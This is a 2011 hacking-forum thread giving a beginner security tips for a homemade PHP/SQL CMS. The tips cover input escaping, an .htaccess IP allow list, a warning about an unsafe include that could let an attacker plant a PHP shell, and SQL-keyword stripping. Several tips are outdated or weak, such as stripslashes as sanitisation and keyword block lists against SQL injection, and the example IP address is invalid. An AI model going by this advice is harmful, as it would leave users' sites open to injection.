Jump to content


Photo
- - - - -

CMS Security


  • Please log in to reply
2 replies to this topic

#1 DaCh

DaCh

    elite

  • Members
  • 106 posts
  • Location:Denmark

Posted 02 February 2011 - 07:22 PM

Hey all.

i working for fun on my own cms.
an now i am thinking about the Security on it,

anyone know how to find mush know Security hole in php an sql sites?

or anything else i can do to make it better?

Sry my noob quistion, but i really learn by doing it.
an thx for your time.

#2 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 03 February 2011 - 07:25 AM

Well, first off, NEVER trust user input.

When inserting records into a mysql database, always sanitize the input by using mysql_real_escape_string (http://php.net/manua...cape-string.php)

Also, when using $_POST[] or $_GET[], you need to sanitize that input as well by using stripslashes, or such.

Incorporating this into any code you do will help you tremendously.

Another thing is, since you are building a CMS, apart from just password protecting the admin page, be sure to use an htaccess. The htaccess should only allow by certain ip's you own.

Example of .htaccess:
AuthUserFile /home/test/.htpasswd
AuthGroupFile /dev/null
AuthName "Administrative Portal"
AuthType Basic

<limit GET>
satisfy any
order deny,allow
deny from all
allow from 127.0.0.1
allow from 221.23.249.294
require valid-user
</limit>

You must place this .htaccess in the directory of your CMS admin page/directory. This will only allow the ip's listed to access your admin page.

Another thing, is when you include files, don't do something like the following:

<?php
include($includedir."/config.php");
?>

If your PHP config is not config'd properly, someone can do an include on your website and use a php shell to take over your website as well as your server.


These are the basics, I hope it helps. If anyone has anything else to add, please do.

#3 heisenbug

heisenbug

    Gibson Hacker

  • Members
  • 79 posts
  • Country:
  • Gender:Male

Posted 06 February 2011 - 01:52 AM

Well, first off, NEVER trust user input.

When inserting records into a mysql database, always sanitize the input by using mysql_real_escape_string (http://php.net/manua...cape-string.php)

Also, when using $_POST[] or $_GET[], you need to sanitize that input as well by using stripslashes, or such.

Incorporating this into any code you do will help you tremendously.

Another thing is, since you are building a CMS, apart from just password protecting the admin page, be sure to use an htaccess. The htaccess should only allow by certain ip's you own.

Example of .htaccess:

AuthUserFile /home/test/.htpasswd
AuthGroupFile /dev/null
AuthName "Administrative Portal"
AuthType Basic

<limit GET>
satisfy any
order deny,allow
deny from all
allow from 127.0.0.1
allow from 221.23.249.294
require valid-user
</limit>

You must place this .htaccess in the directory of your CMS admin page/directory. This will only allow the ip's listed to access your admin page.

Another thing, is when you include files, don't do something like the following:

<?php
include($includedir."/config.php");
?>

If your PHP config is not config'd properly, someone can do an include on your website and use a php shell to take over your website as well as your server.


These are the basics, I hope it helps. If anyone has anything else to add, please do.

If only a few people you know are going to be using this, then create a certificate and require the browser to have it.

You might want to protect yourself from SQL injections. Striping out semi-colons is important. Also less than, greater than, equals signs, etc... And if it doesn't need to be in there, INSERT, DELETE, DROP, UPDATE, etc. (No one should have a First Name, Age, Etc of DROP or UPDATE)

Use dropdown menus, check-boxes, radio buttons, etc whenever possible. The option they pick better damn well be one of the choices you gave them. If it isn't then I would just log their IP and exit out of the script.




BinRev is hosted by the great people at Lunarpages!